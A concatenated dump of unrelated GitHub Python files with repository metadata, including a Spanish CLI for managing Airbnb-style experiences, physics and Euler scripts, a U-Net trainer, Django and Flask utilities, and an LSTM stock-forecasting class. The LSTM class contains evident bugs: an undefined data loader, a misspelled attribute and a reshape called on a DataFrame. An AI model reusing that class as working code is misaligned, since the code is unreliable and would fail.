idTematic=input(\"Ingrese el id de la tematica: \")\n strFechaCompleta = strFecha+\" \"+strHora\n elif idTematic==0:\n idTematic= self.dbtematica.insertTematica()\n strFechaCompleta = strFecha+\" \"+strHora\n\n self.dbexperiencia.insertExperiencia(host,ExperienceTitle,TypeExperience,Location,\n description, Idiom,PublicObject,Organization,hostExperience,NeedElements,PrecioIndividual,\n strFechaCompleta,idTematic)\n\n idexperiencia=self.dbexperiencia.traerIDExperiencia(host,ExperienceTitle,TypeExperience,\n Location, description, Idiom,PublicObject,Organization,hostExperience,NeedElements,PrecioIndividual,\n strFechaCompleta,idTematic)\n \n print(\"\\nSu experiencia se ha creado con éxito.\\n\")\n print(f\"Su código de experiencia único es {idexperiencia}.\\n\")\n \n #UPDATES\n def updateOrdenarExperiencia(self):\n self.updateExperiencia()\n\n def updateExperiencia(self):\n print(\"\\nUpdating an existing experiencia...\")\n id = int(input(\"\\nID de la experiencia a actualizar: \"))\n\n experiencia = self.dbexperiencia.searchExperienciaById(id)\n\n update = int(input(\"¿Actualizar el anfitrion? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Anfitrion antigÜo : {experiencia.host}\")\n host = input(\"Nuevo anfitrion: \")\n else:\n host = experiencia.host\n\n update = int(input(\"¿Actualizar el titulo de la experiencia? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüo titulo de la experiencia: {experiencia.ExperienceTitle}\")\n ExperienceTitle = input(\"Nuevo titulo de experiencia: \")\n else:\n ExperienceTitle = experiencia.ExperienceTitle\n\n update = int(input(\"¿Actualizar el tipo de experiencia? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüo tipo de experiencia: {experiencia.TypeExperience}\")\n TypeExperience = input(\"Nuevo tipo de experiencia: \")\n else:\n TypeExperience = experiencia.TypeExperience\n\n update = int(input(\"¿Actualizar la ubicacion? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüa ubicacion: {experiencia.Location}\")\n Location = input(\"Nueva ubicacion: \")\n else:\n Location = experiencia.Location\n\n update = int(input(\"¿Actualizar la descripción? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüa descripción: {experiencia.Descrption}\")\n Descrption = input(\"Nueva descripción: \")\n else:\n Descrption = experiencia.Descrption\n\n update = int(input(\"¿Actualizar el idioma? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüo idioma: {experiencia.Idiom}\")\n Idiom = input(\"Nuevo idioma: \")\n else:\n Idiom = experiencia.Idiom\n\n update = int(input(\"¿Actualizar el publico objetivo? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüo publico objetivo: {experiencia.PublicObject}\")\n PublicObject = input(\"Nuevo publico objetivo: \")\n else:\n PublicObject = experiencia.PublicObject\n\n update = int(input(\"¿Actualizar la organización? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüa organización: {experiencia.Organization}\")\n Organization = input(\"Nueva organización: \")\n else:\n Organization = experiencia.Organization\n\n update = int(input(\"¿Actualizar la experiencia del anfitrion? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüa experiencia del anfitrion: {experiencia.hostExperience}\")\n hostExperience = input(\"Nueva experiencia del anfitrion: \")\n else:\n hostExperience = experiencia.hostExperience\n\n update = int(input(\"¿Actualizar los elementos a necesitar? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüos elementos a necesitar: {experiencia.NeedElements}\")\n NeedElements = input(\"Nuevos elementos a necesitar: \")\n else:\n NeedElements = experiencia.NeedElements\n\n update = int(input(\"¿Actualizar el precio? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"Antigüo precio: {experiencia.precio}\")\n precio = round(float(input(\"Nuevo precio: \")),2)\n else:\n precio = experiencia.precio\n\n update = int(input(\"¿Actualizar fecha de la experiencia? 0-No - 1-Sí: \"))\n if update == 1:\n print(f\"Fecha de retirada Vieja: {experiencia.fecha}\")\n strfecha = input(\"Nueva Fecha (yyyy-mm-dd): \")\n strhora = input(\"Nueva hora (hh:mm:ss): \")\n strfechacompleta = strfecha+' '+strhora\n else:\n strfechacompleta = experiencia.fecha\n\n update = int(input(\"¿Actualizar temática? 0-No - 1-Yes: \"))\n if update == 1:\n print(f\"id Antigüa temática: { experiencia.idTematic}\")\n ordenarTematica()\n idTematic = input(\"Nueva temática: \")\n else:\n idTematic = experiencia.idTematic\n\n self.dbexperiencia.updateExperienciaBD(id, host, ExperienceTitle, TypeExperience,\n Location, Descrption, Idiom, PublicObject, Organization, hostExperience, \n NeedElements, precio, strfechacompleta, idTematic)\n print(\"\\nLos cambios se han efectuado con éxito.\")\n\n\n #DELETACION\n def deleteOrganizarExperiencia(self):\n self.deleteExperiencia()\n\n def deleteExperiencia(self):\n print(\"Borrando experiencia...\")\n id = int(input(\"ID de la experiencia a eliminar: \"))\n\n self.dbexperiencia.deleteExperienciaDB(id)\n print(\"La experiencia se ha removido con éxito.\")\n\n #ORDENAR\n\n def ordenarTematica(self):\n result = self.dbtematica.getTematicas()\n\n table = PrettyTable()\n table.field_names = [\"IdTematica\", \"NombreTematica\", \"Descripcion\"]\n\n for tematica in result:\n table.add_row([\n tematica.id,\n tematica.tematicaname,\n tematica.description\n ])\n\n print(table)\n table.clear()","repo_name":"DAP-web/AirbnbProyect","sub_path":"Entrega Final/Views/View_OrdenarExperiencia.py","file_name":"View_OrdenarExperiencia.py","file_ext":"py","file_size_in_byte":10036,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"30265543070","text":"import numpy as np\nfrom scipy.integrate import solve_ivp\n\nimport matplotlib.pyplot as plt\n\n# Function to be integrated in the form of yprime = (f(t, y)\ndef equations(t, y):\n\n # Constants\n m = 70\n R0 = 6370000\n H = 8000\n\n # Calculate position-depenent gravity and height-dependent drag\n # coefficient.\n g = 9.81 / (1 + y[0] / R0)**2\n c2 = 0.5 * np.exp(-y[0] / H)\n\n # Drag force\n F_drag = -c2 * y[1] * np.abs(y[1])\n\n # dy/dt = V\n yprime = y[1]\n\n # Acceleration, dV/dt = Force / mass\n vprime = (-m*g + F_drag) / m\n\n # Return values\n return [yprime, vprime]\n\ndef events(t, y):\n return y[0] - 0\n\nevents.terminal = True\n\n# Set up initial conditions\ny0 = [32000, 0]\n\n# The variable tspan has the start and end times of the inegration which\n# teval is a vector of time points for the solution to be evaulated at.\ntspan = (0, 1200)\nteval = np.linspace(tspan[0], tspan[1], 1000)\n\n# Call the solver.\nsol = solve_ivp(equations, tspan, y0, t_eval = teval, events = events)\n\n# Extract the time and position/velocty vector from sol\nt = sol.t\ny = sol.y\n\n# Print the time to impact. This will be an empty vector if no event was\n# detected.\nprint('Time to impact = ', sol.t_events[-1]);\n\n\n# Plot the results\nplt.subplot(1, 2, 1); plt.plot(t, y[0, :], 'k')\nplt.xlabel('Time (s)'); plt.ylabel('Altitude (m)');\nplt.subplot(1, 2, 2); plt.plot(t, y[1, :], 'k')\nplt.xlabel('Time (s)'); plt.ylabel('Velocity (m/s)');\nplt.show()\n","repo_name":"kpmooney/numerical_methods_youtube","sub_path":"free_fall/free_fall.py","file_name":"free_fall.py","file_ext":"py","file_size_in_byte":1470,"program_lang":"python","lang":"en","doc_type":"code","stars":127,"dataset":"github-code","pt":"35"} +{"seq_id":"71668751461","text":"import json\n\nPOST_PATH = 'posts.json'\n\n\ndef load_posts():\n with open(POST_PATH, 'r', encoding='utf-8') as f:\n posts = json.load(f)\n return posts\n\n\ndef uploads_posts(post):\n posts = load_posts()\n posts.append(post)\n\n with open(POST_PATH, 'w', encoding='utf-8') as f:\n json.dump(posts, f, ensure_ascii=False, indent=4)\n\n\n","repo_name":"pryanikkun/hometask12","sub_path":"functions.py","file_name":"functions.py","file_ext":"py","file_size_in_byte":352,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1554075641","text":"def get_area(vertex):\n unit = set()\n for i in vertex:\n x = range(i[0],i[2])\n y = range(i[1],i[3])\n for j in x:\n for k in y:\n unit.add((j,k))\n return unit \n\n\nT = []\nfor i in range(4):\n T.append(list(map(int,input().split())))\n\nans = get_area(T)\nprint(len(ans))","repo_name":"WoowonKim/APS","sub_path":"Previous_work/BJ2669.py","file_name":"BJ2669.py","file_ext":"py","file_size_in_byte":324,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"70402887782","text":"import itertools\n\ntime_limit = 401\nplayer_dict = {}\nnum = 1\norder = []\n\nplayers = \"\"\"Person 1 will take 29 minutes to cross the bridge.\nPerson 2 will take 3 minutes to cross the bridge.\nPerson 3 will take 38 minutes to cross the bridge.\nPerson 4 will take 9 minutes to cross the bridge.\nPerson 5 will take 72 minutes to cross the bridge.\nPerson 6 will take 11 minutes to cross the bridge.\nPerson 7 will take 97 minutes to cross the bridge.\n\"\"\"\nplayers = players.split(\".\")\n\nfor player in players:\n player = player.split(\" \")\n if num < len(players):\n player_dict[int(player[1])] = int(player[4])\n num += 1\n\nfast_dict = dict(sorted(player_dict.items(), key=lambda item: item[1]))\nstart_dict = fast_dict\nend_dict = {}\ntwo_fastest = dict(itertools.islice(fast_dict.items(), 2))\n\n\ndef start_side():\n global start_dict\n global end_dict\n global order\n start_dict = dict(sorted(start_dict.items(), key=lambda item: item[1]))\n \n if len(start_dict) >= 2:\n # If two fastest people are present in starting side send them to far side\n if set(two_fastest.items()).issubset(set(start_dict.items())):\n # Remove two fastest people from start_dict\n start_dict.pop(list(two_fastest.keys())[0])\n start_dict.pop(list(two_fastest.keys())[1])\n # Add the two moved to end_dict\n end_dict.update(two_fastest)\n # Add the two people sent over to the order\n order.append(list(two_fastest.keys()))\n far_side()\n else:\n #Send the two slowest people\n slowest = dict(itertools.islice(start_dict.items(), len(start_dict) - 2, len(start_dict)))\n start_dict.pop(list(slowest.keys())[-1])\n start_dict.pop(list(slowest.keys())[-2])\n end_dict.update(slowest)\n order.append(list(slowest.keys()))\n\n far_side()\n\n \ndef far_side():\n global start_dict\n global end_dict\n global order\n if len(start_dict) > 0:\n end_dict = dict(sorted(end_dict.items(), key=lambda item: item[1]))\n fastest = dict(itertools.islice(end_dict.items(), 1))\n end_dict.pop(list(fastest.keys())[0])\n start_dict.update(fastest)\n order.append(list(fastest.keys()))\n\n start_side()\n\nstart_side()\n\n# print(start_dict)\n# print(end_dict)\n# print(order)\nprint(order)","repo_name":"MasonBrott/CTF","sub_path":"bridge_crossing.py","file_name":"bridge_crossing.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"13611747782","text":"#!/usr/bin/env python\nimport os\nimport sys\n\nimport django\nfrom django.conf import settings\nfrom django.test.utils import get_runner\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\n\n\ndef root(*x):\n return os.path.join(BASE_DIR, *x)\n\n\nif not settings.configured:\n settings.configure(\n DEBUG=True,\n DATABASES={\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": \"test_db\",\n }\n },\n INSTALLED_APPS=(\n \"django.contrib.contenttypes\",\n \"django.contrib.staticfiles\",\n \"dc_utils\",\n \"test_project\",\n \"dc_signup_form\",\n ),\n ROOT_URLCONF=\"test_project.urls\",\n TEMPLATES=[\n {\n \"BACKEND\": \"django.template.backends.django.DjangoTemplates\",\n \"APP_DIRS\": True,\n \"DIRS\": [\n root(\"test_project/templates\"),\n ],\n \"OPTIONS\": {\n \"debug\": True,\n \"context_processors\": [\n \"dc_utils.context_processors.dc_django_utils\",\n \"dc_signup_form.context_processors.signup_form\",\n ],\n },\n }\n ],\n MIDDLEWARE=[\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n ],\n SECRET_KEY=\"testing_key\",\n )\n\ndjango.setup()\nTestRunner = get_runner(settings)\ntest_runner = TestRunner(verbosity=1, interactive=True, failfast=False)\nfailures = test_runner.run_tests(\n [\n \"dc_signup_form\",\n ]\n)\nsys.exit(failures)\n","repo_name":"DemocracyClub/dc_signup_form","sub_path":"run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40898830626","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport numpy as np\nimport h5py\nimport math\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LinearSegmentedColormap\nfrom sklearn.model_selection import KFold\nimport GeneratorSequence as gs\nimport saveloadmodel as slm\n\nfrom keras.callbacks import ModelCheckpoint, CSVLogger, Callback\nfrom keras.utils import to_categorical\nfrom keras.models import Sequential\nfrom keras.layers import Conv2D, UpSampling2D, MaxPooling2D\nfrom keras.layers.core import Activation, Dense, Flatten\nfrom keras.optimizers import SGD\nfrom keras.models import load_model, save_model\nfrom keras.layers.convolutional import Conv1D, MaxPooling1D\nfrom keras.models import Model\nfrom keras.layers import Input, merge, ZeroPadding2D, concatenate, BatchNormalization\nfrom keras.layers.core import Dropout\nfrom keras import backend as K\nfrom keras.utils.generic_utils import get_custom_objects\nfrom keras.callbacks import CSVLogger\nimport tensorflow as tf\ntf.get_logger().setLevel('INFO')\n\n#%%\nh = 128\nw = 256\nhdf_data = h5py.File('..\\\\data\\\\HDF_' + str(h) + 'x' + str(w) + '_aug.h5', 'r')\n\ncategories = [[8]]\n\nn_classes = 17\nbatch_size = 64\nepochs = 6\n\n\n# a hirhedt Hargitai féle loss function, source: https://towardsdatascience.com/metrics-to-evaluate-your-semantic-segmentation-model-6bcb99639aa2\ndef iou_loss(y_true, y_pred, smooth=1):\n intersection = K.sum(K.abs(y_true * y_pred), axis=[1, 2, 3])\n union = K.sum(y_true, [1, 2, 3])+K.sum(y_pred, [1, 2, 3])-intersection\n iou = K.mean((intersection + smooth) / (union + smooth), axis=0)\n return 1 - iou\nget_custom_objects().update({\"iou_loss\": iou_loss}) # defining new loss function for keras\n\n\n# creating an Unet\n# more about the network can be found in our documentation\n\n# TODO: zero padding?\n\ndef create_empty_unet(output_layers = 1):\n inputs = Input((h, w, 4))\n # encoder part\n conv1 = Conv2D(8, (3, 3), padding='same')(inputs)\n conv1 = BatchNormalization(axis=3, momentum=0.9)(conv1)\n conv1 = Activation('relu')(conv1)\n # maxpooling\n # dropout\n \n conv2 = Conv2D(16, (3, 3), padding='same', strides=2)(conv1)\n conv2 = BatchNormalization(axis=3, momentum=0.9)(conv2)\n conv2 = Activation('relu')(conv2)\n \n conv3 = Conv2D(32, (3, 3), padding='same', strides=2)(conv2)\n conv3 = BatchNormalization(axis=3, momentum=0.9)(conv3)\n conv3 = Activation('relu')(conv3)\n \n conv4 = Conv2D(64, (3, 3), padding='same', strides=2)(conv3)\n conv4 = BatchNormalization(axis=3, momentum=0.9)(conv4)\n conv4 = Activation('relu')(conv4)\n \n conv5 = Conv2D(128, (3, 3), padding='same', strides=2)(conv4)\n conv5 = BatchNormalization(axis=3, momentum=0.9)(conv5)\n conv5 = Activation('relu')(conv5)\n \n # decoder part\n concat1 = concatenate([UpSampling2D((2, 2))(conv5), conv4], axis=3)\n conv6 = Conv2D(64, (3, 3), padding='same')(concat1)\n conv6 = BatchNormalization(axis=3, momentum=0.9)(conv6)\n conv6 = Activation('relu')(conv6)\n \n concat2 = concatenate([UpSampling2D((2, 2))(conv6), conv3], axis=3)\n conv7 = Conv2D(32, (3, 3), padding='same')(concat2)\n conv7 = BatchNormalization(axis=3, momentum=0.9)(conv7)\n conv7 = Activation('relu')(conv7)\n \n concat3 = concatenate([UpSampling2D((2, 2))(conv7), conv2], axis=3)\n conv8 = Conv2D(16, (3, 3), padding='same')(concat3)\n conv8 = BatchNormalization(axis=3, momentum=0.9)(conv8)\n conv8 = Activation('relu')(conv8)\n \n concat4 = concatenate([UpSampling2D((2, 2))(conv8), conv1], axis=3)\n conv9 = Conv2D(8, (3, 3), padding='same')(concat4)\n conv9 = BatchNormalization(axis=3, momentum=0.9)(conv9)\n conv9 = Activation('relu')(conv9)\n \n output = Conv2D(output_layers, (1, 1), activation='sigmoid', padding='same')(conv9)\n \n unet = Model(inputs, output)\n \n # we used mean absolute error at the beginning\n unet.compile(optimizer='adam', loss=iou_loss)\n \n return unet\n\n\n# %%\n\nnp_train_valid_dataset = np.array(hdf_data['train_valid'], dtype=np.uint8)\n\nn_samples_list = list(range(hdf_data['train_valid'].shape[0]))\n\nkf = KFold(n_splits=5, shuffle=True)\n\nfor i in range(epochs):\n for cats in categories:\n model_name = 'NET_' + str(h) + 'x' + str(w) + '_cat%02d' % (cats[0])\n for i in range(1,len(cats)):\n model_name = model_name + '_%02d' % cats[i]\n log_path = '..\\\\logs\\\\' + model_name + '.csv'\n open(log_path, 'a+').close() # file letrehozasa ha nem letezne\n \n model = slm.load_last_model(model_name)\n if model == None:\n model = create_empty_unet(len(cats))\n model.summary()\n \n for train_index, valid_index in kf.split(n_samples_list):\n # train_gen = gs.GeneratorSequence(hdf_data['train_valid'], train_index, n_classes, batch_size = batch_size, categories = cats)\n # valid_gen = gs.GeneratorSequence(hdf_data['train_valid'], valid_index, n_classes, batch_size = batch_size, categories = cats)\n \n train_gen = gs.GeneratorSequence(np_train_valid_dataset, train_index, n_classes, batch_size = batch_size, categories = cats)\n valid_gen = gs.GeneratorSequence(np_train_valid_dataset, valid_index, n_classes, batch_size = batch_size, categories = cats)\n \n model.fit(train_gen, validation_data = valid_gen, \\\n callbacks = [slm.CheckPointer(model_name), \\\n CSVLogger(log_path, append=True, separator=',')])\n \n \n# %%\ntestsize = 100\nteststart = 00*6+00\nlabellist = [[70, 70, 70], # Building 0\n [100, 40, 40], # Fence->other 1\n [220, 20, 60], # Pedestrian 2\n [153, 153, 153], # Pole 3\n [157, 234, 50], # RoadLine 4\n [128, 64, 128], # Road 5\n [244, 35, 232], # Sidewalk 6\n [107, 142, 35], # Vegetation 7\n [0, 0, 142], # Vehicles 8\n [102, 102, 156], # Wall 9\n [220, 220, 0], # TrafficSign 10\n [70, 130, 180], # Sky 11\n [81, 0, 81], # Ground 12\n [230, 150, 140], # Railtrack 13\n [250, 170, 30], # TrafficLight 14\n [110, 190, 160], # Static 15 -> 1\n [170, 120, 50], # Dinamic 16 -> 1\n [45, 60, 150], # Water 17 -> 15\n [145, 170, 100] # Terrain 18 -> 16\n ]\n\ntest_x = hdf_data['test'][teststart:teststart+testsize,:,:,0:4]\npreds = model.predict(test_x)\n\n\n# for i in range(testsize):\n# pred = preds[i]\n# predcolor = np.zeros([pred.shape[0],pred.shape[1],3], dtype=np.uint8)\n# for cindex, col in enumerate(pred):\n# for lindex, labl in enumerate(col):\n# predcolor[cindex,lindex,0] = labellist[np.argmax(labl)][0]\n# predcolor[cindex,lindex,1] = labellist[np.argmax(labl)][1]\n# predcolor[cindex,lindex,2] = labellist[np.argmax(labl)][2]\n# plt.figure()\n# plt.title(str(i))\n# plt.imshow(predcolor)\n\n\n# #%%\n# for i in range(19):\n# plt.figure()\n# plt.imshow(preds[0,:,:,i])\n# plt.title(str(i))\n \nfor i in range(testsize):\n plt.figure()\n plt.suptitle(i)\n plt.subplot(preds.shape[-1]+1,1,1)\n plt.imshow(test_x[i,:,:,0:3])\n for j in range(preds.shape[-1]):\n plt.subplot(preds.shape[-1]+1, 1, j+2)\n plt.imshow(preds[i,:,:,j])\n\n\n#%%\n# for i in range(hdf_data['train_valid'].shape[0]):\n# plt.figure()\n# plt.imshow(hdf_data['train_valid'][i,:,:,0:3])\n# plt.title(str(i))","repo_name":"hargitaibalint/SZGLR_HF","sub_path":"nn1_unet.py","file_name":"nn1_unet.py","file_ext":"py","file_size_in_byte":7627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71496179621","text":"from impo import impo\n\nimpo.imp_inst('pandas')\nimpo.imp_inst('scikit-learn')\nimpo.imp_inst('numpy')\nimpo.imp_inst('tensorflow')\nimpo.imp_inst('keras')\nimpo.imp_inst('matplotlib')\nimpo.imp_inst('plotly')\n\nimport pandas as pd\nfrom datetime import date\nfrom sklearn.preprocessing import StandardScaler\nfrom tensorflow.keras.callbacks import EarlyStopping\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.models import load_model\nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM, Dropout\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.dates as mdates\nimport plotly.graph_objs as go\n\n\nclass lstm():\n def __init__(self, ticker: str):\n self.ticker = ticker\n self.data = None\n self.data_original = None\n self.new_data = None\n self.dat_orig_final = None\n self.X = None\n self.y = None\n self.split_idx = None\n self.model = None\n self.x_pred = None\n self.y_pred = None\n self.new_pred = None\n self.preds_train = None\n self.preds_test = None\n self.new_preds = None\n\n def get_data(self):\n ## Call function to get data in csv\n self.data = self.function(self.ticker)\n self.data_original = self.data.copy()\n\n def preprocess(self):\n # Preprocess date column\n if self.data is None:\n self.get_data()\n\n self.data['Date'] = pd.to_datetime(self.data['date'])\n self.data.drop(['date'], axis=1, inplace=True)\n\n self.data['Year'] = self.data['Date'].dt.year\n self.data['Month'] = self.data['Date'].dt.month\n self.data['Day'] = self.data['Date'].dt.day\n\n self.data = pd.get_dummies(self.data, columns=['Month']) # one-hot encode month column\n\n # set the 'date' column as the DataFrame's index\n self.data.set_index('Date', inplace=True)\n\n # lag the 'close_price' column by three months\n self.data['close_price_lagged'] = self.data['close'].shift(6*30)\n\n # reset the index back to a column\n self.data.reset_index(inplace=True)\n\n # create new data as last three months of data\n self.new_data = self.data[self.data['close_price_lagged'].isna()==True].copy().drop(['close_price_lagged'], axis=1)\n self.data_orig_final = self.data.copy()\n self.data = self.data[self.data['close_price_lagged'].isna()==False].copy()\n\n self.data = self.data.drop('Date', axis=1)\n\n # scale data\n scaler = StandardScaler()\n self.data.iloc[:, 1:28] = scaler.fit_transform(self.data.iloc[:, 1:28]) # standardize year and day columns\n self.new_data.iloc[:, 1:28] = scaler.fit_transform(self.new_data.iloc[:, 1:28])\n\n self.X = self.data.drop('close_price_lagged', axis=1).values\n self.y = self.data['close_price_lagged'].values.reshape(-1, 1)\n\n # reshape for LSTM\n self.X = self.X.reshape(self.X.shape[0], 1, self.X.shape[1]) # reshape to 3D array\n\n def train_lstm(self, idx=0.8):\n if self.X is None:\n self.preprocess()\n\n # Split the data into training and testing sets\n self.split_idx = int(len(self.X) * idx)\n X_train, X_test = self.X[:self.split_idx], self.X[self.split_idx:]\n y_train, y_test = self.y[:self.split_idx], self.y[self.split_idx:]\n\n # Define the LSTM model\n model = Sequential()\n model.add(LSTM(50, activation='relu', return_sequences=True, input_shape=(1, self.X.shape[2])))\n for n in range(5):\n model.add(LSTM(20, activation='relu', return_sequences=True))\n model.add(LSTM(20, activation='relu', return_sequences=False))\n model.add(Dropout(0.1))\n model.add(Dense(20, activation='relu'))\n model.add(Dense(1))\n\n # Compile the model with an appropriate learning rate and metric\n opt = Adam(learning_rate=0.01)\n model.compile(optimizer=opt, loss='mean_absolute_error', metrics=['mae'])\n\n # Define early stopping criteria\n early_stopping = EarlyStopping(monitor='val_loss', patience=200)\n\n # Train the model with early stopping\n history = model.fit(X_train, y_train, epochs=2000, verbose=1, validation_data=(X_test, y_test), callbacks=[early_stopping])\n\n # Use the best model for predictions\n y_pred = model.predict(X_test)\n x_pred = model.predict(X_train)\n\n # Calculate the MAE\n mae = np.mean(np.abs(y_pred - y_test))\n\n # Print the MAE\n print(\"MAE: \", mae)\n\n self.x_pred = [x[0] for x in x_pred]\n self.y_pred = [x[0] for x in y_pred]\n\n # Save the model\n model.save(f\"best_model_{self.ticker}.h5\")\n self.model = load_model(f\"best_model_{self.ticker}.h5\")\n\n\n def plot_train(self):\n if self.model is None:\n self.train_lstm()\n \n self.preds_train = pd.DataFrame({\n 'Date': self.data_orig_final['Date'][:self.split_idx],\n 'Predictions': self.split_idxx_pred,\n 'Observed': self.data_orig_final['close_price_lagged'][:self.split_idx]\n })\n\n self.preds_train.to_csv('train_pred.csv')\n\n fig, ax = plt.subplots(figsize=(12,8))\n plt.title('Train Predictions')\n ax.plot('Date', 'Predictions', data=self.preds_train, label='Predictions')\n ax.plot('Date', 'Observed', data=self.preds_train, label='Observed', linewidth=0.5) # set alpha to 0.5 for the Observed line\n plt.xticks(rotation=60)\n ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=3))\n ax.legend()\n plt.show()\n\n def plot_test(self):\n if self.model is None:\n self.train_lstm()\n\n self.preds_test = pd.DataFrame({\n 'Date': self.data_orig_final['Date'][self.split_idx:],\n 'Predictions': self.y_pred,\n 'Observed': self.data_orig_final['close_price_lagged'][self.split_idx:]\n })\n\n self.preds_test.to_csv('test_pred.csv')\n\n fig, ax = plt.subplots(figsize=(12,8))\n plt.title('Test Predictions')\n ax.plot('Date', 'Predictions', data=self.preds_test, label='Predictions')\n ax.plot('Date', 'Observed', data=self.preds_test, label='Observed', linewidth=0.5) # set alpha to 0.5 for the Observed line\n plt.xticks(rotation=60)\n ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))\n ax.legend()\n plt.show()\n\n def predict(self):\n if self.model is None:\n try:\n self.model = load_model(f\"best_model_{self.ticker}.h5\")\n except Exception:\n self.train_lstm()\n\n #Reshape X to match LSTM input shape\n self.new_data = self.new_data.reshape((self.new_data.shape[0], 1, self.new_data.shape[1]))\n self.new_pred = self.model.predict(self.new_data)\n self.new_pred = [x[0] for x in self.new_pred]\n\n def plot_preds(self):\n if self.new_pred is None:\n self.predict()\n\n self.new_preds = pd.DataFrame({\n 'Date': self.new_data['Date'],\n 'Predictions': self.new_pred\n })\n\n self.new_preds.to_csv(f'new_preds_{self.ticker}.csv')\n\n fig, ax = plt.subplots(figsize=(12,8))\n plt.title('Next 6 Months Predictions')\n ax.plot('Date', 'Predictions', data=self.new_preds, label='Predictions')\n plt.xticks(rotation=60)\n ax.xaxis.set_major_locator(mdates.WeekdayLocator(interval=1))\n ax.legend()\n plt.show()\n\n def plot_all(self):\n if self.new_pred is None:\n self.predict()\n\n date_new = pd.concat([self.data_orig_final['Date'], self.new_data['close_price_lagged']], axis=0)\n len_zeros = int(len(date_new)-len(self.data_orig_final['close_price_lagged']))\n observed_new = pd.concat([self.data_orig_final['close_price_lagged'], pd.Series(np.zeros(len_zeros))], axis=0)\n predictions_new = pd.concat([self.preds_train['Predictions'], self.preds_test['Predictions'], self.new_preds['Predictions']])\n\n predictions_concat = pd.DataFrame({\n 'Date': date_new,\n 'Observed': observed_new,\n 'Predictions': predictions_new\n })\n\n\n # Create a trace for the observed values\n trace_observed = go.Scatter(x=predictions_concat['Date'], y=predictions_concat['Observed'], name='Observed')\n\n # Create a trace for the predictions\n trace_predictions = go.Scatter(x=predictions_concat['Date'], y=predictions_concat['Predictions'], name='Predictions')\n\n # Create a layout for the graph\n layout = go.Layout(\n title='Next 6 Months Predictions',\n xaxis=dict(title='Date', tickangle=60),\n yaxis=dict(title='Values'),\n )\n\n # Create a figure and add the traces and layout\n fig = go.Figure(data=[trace_observed, trace_predictions], layout=layout)\n\n # Show the graph\n fig.show()","repo_name":"yaoyzz/Finance-LLM","sub_path":"lstm/.ipynb_checkpoints/lstm-checkpoint.py","file_name":"lstm-checkpoint.py","file_ext":"py","file_size_in_byte":8937,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"33327857906","text":"from timing import timing_function\nfrom arithmetic import primes, isPrime\n\nprimes = primes(1000) \nwhile primes[0] <= 40:\n primes.pop(0)\n\nprimes.extend([-p for p in primes])\n\ndef quadratic(a : int , b : int , n : int):\n return n**2 + a*n + b\n\ndef consecutive(a : int , b : int):\n n = 0\n while isPrime(quadratic(a, b, n)):\n n +=1\n return n\n\ndef euler_27():\n maxConsecutive = -1\n for a in range(-999, 1000):\n for b in primes:\n aux = consecutive(a, b)\n if aux > maxConsecutive:\n maxA, maxB, maxConsecutive = a, b, aux\n return maxA * maxB\n# return (maxA, maxB, maxA * maxB, maxConsecutive)\n\n\ndef main():\n print(timing_function(euler_27))\n\nmain()\n\n","repo_name":"dbirmajer/Project-Euler","sub_path":"euler_27.py","file_name":"euler_27.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"22948926110","text":"from django.contrib.postgres.operations import CreateExtension, HStoreExtension, TrigramExtension, UnaccentExtension\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n run_before = [\n ('geo', '0001_initial'),\n ]\n\n operations = [\n HStoreExtension(),\n UnaccentExtension(),\n TrigramExtension(),\n CreateExtension('postgis'),\n ]\n","repo_name":"marcodelmoral/sis_prototipo","sub_path":"sis_prototipo/apps/geo/migrations/install_extensions.py","file_name":"install_extensions.py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"30116285821","text":"from flask_restplus import reqparse\n\nupdate_shoppinglist_parser = reqparse.RequestParser()\nupdate_shoppinglist_parser.add_argument('name', type=str,\n help='New Shoppinglist Name')\nupdate_shoppinglist_parser.add_argument('description', type=str,\n help='Shoppinglist description should not be blank')\n\nupdate_item_parser = reqparse.RequestParser()\nupdate_item_parser.add_argument('name', type=str, required=True, help='Item name should be provided')\nupdate_item_parser.add_argument('price', required=True, help='Item price should be provided')\nupdate_item_parser.add_argument('quantity', required=True, help='Item quantity should be provided')\nupdate_item_parser.add_argument('unit', required=True, help='enter a unit of 